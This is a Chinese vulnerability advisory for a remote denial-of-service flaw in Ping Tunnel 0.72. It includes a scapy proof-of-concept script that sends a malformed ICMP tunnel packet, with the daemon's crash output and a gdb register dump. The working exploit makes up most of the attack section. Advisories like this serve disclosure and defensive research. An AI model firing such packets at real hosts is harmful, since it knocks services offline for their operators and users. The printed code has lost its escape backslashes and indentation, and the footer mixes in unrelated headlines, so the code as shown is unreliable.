发布日期:2012-07-20
更新日期:2012-07-25受影响系统:
freecode Ping Tunnel 0.72
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 54627Ping Tunnel是一个可靠的隧道效应的TCP连接工具,通过ICMP回声请求和应答数据包连接到远程主机,俗称ping请求和回复。ptunnel 0.72及其他版本在实现上存在远程拒绝服务漏洞,攻击者可利用此漏洞造成受影响应用崩溃。<*来源:st3n
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!st3n ()提供了如下测试方法:
#===============================================================================
# PoC code (scapy)
#===============================================================================from scapy.all import *
conf.verbose = 0# arg ?
if len(sys.argv) < 1:
sys.exit("Usage: %s <host>" % sys.argv[0])# target
remote_host = sys.argv[1]# ptunnel.h
#typedef struct {
# uint32_t magic, // magic number, used to identify ptunnel packets.
# dst_ip, // destination IP and port (used by proxy to figure
# dst_port, // out where to tunnel to)
# state, // current connection state; see constants above.
# ack, // sequence number of last packet received from other end
# data_len; // length of data buffer
# uint16_t seq_no, // sequence number of this packet
# id_no; // id number, used to separate different tunnels from each other
# char data[0]; // optional data buffer
#} __attribute__ ((packed)) ping_tunnel_pkt_t;# build packet
magic="xd5x20x08x80"
dst_ip="AAAA"
dst_port="BBBB"
state="CCCC" # <===== this trigger the vulnerability
ack="x00x00xffxff"
data_len="x00x00x00x00"
seq_id="DDDD"
pkt = IP(dst=remote_host)/ICMP()/Raw(magic)/Raw(dst_ip)/Raw(dst_port)/Raw(state)/Raw(ack)/Raw(data_len)/Raw(seq_id)# evil evil packet
send(pkt)
#=========================================================================
# Example & Info
#=========================================================================# Sending evil packet
# -------------------# $ sudo ./ptunnel-dos.py 127.0.0.1
# .
# Sent 1 packets. # Daemon side
# -----------# $ ptunnel -c lo
# [inf]: Starting ptunnel v 0.72.
# [inf]: (c) 2004-2011 Daniel Stoedle, <daniels@cs.uit.no>
# [inf]: Security features by Sebastien Raveau, <sebastien.raveau@epita.fr>
# [inf]: Forwarding incoming ping packets over TCP.
# [inf]: Initializing pcap.
# [inf]: Ping proxy is listening in privileged mode.
# Segmentation fault
# Debug info
# -----------# Program received signal SIGSEGV, Segmentation fault.
# handle_packet (buf=0x80774a0 "E", bytes=56, is_pcap=1, addr=0xbffff65c, icmp_sock=7) at ptunnel.c:957
# 957 pt_log(kLog_sendrecv, "Recv: %d [%d] bytes [seq = %d] [type = %s] [ack = %d] [icmp = %d] [user = %s] [pcap = %d]
",
# (gdb)
# (gdb) i r
# eax 0x3434343 54739779
# ecx 0x0 0
# edx 0x3434343 54739779
# ebx 0x8050184 134545796
# esp 0xbffff380 0xbffff380
# ebp 0xbffff468 0xbffff468
# esi 0xffff 65535
# edi 0xbffff5c8 -1073744440
# eip 0x804cdfa 0x804cdfa <handle_packet+494>
# eflags 0x10202 [ IF RF ]
# cs 0x73 115
# ss 0x7b 123
# ds 0x7b 123
# es 0x7b 123
# fs 0x0 0
# gs 0x33 51
# eof建议:
--------------------------------------------------------------------------------
厂商补丁:freecode
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://freecode.com/projects/eCryptfs本地权限提升漏洞Open Handset Alliance Android远程DNS缓存投毒漏洞相关资讯 拒绝服务漏洞 Ping Tunnel
- 数字签名拒绝服务漏洞(CVE-2013- (11/13/2013 12:25:03)
- Intel 82574L Gigabit Ethernet (03/01/2013 21:09:03)
- Wireshark DTN Dissector 拒绝服务 (02/03/2013 10:37:43)
| - Rockwell Automation FactoryTalk (04/10/2013 09:08:12)
- IBM WebSphere Message Broker多个 (03/01/2013 21:04:45)
- HP XP P9000 Command View (02/03/2013 10:36:32)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用
|
易网时代-编程资源站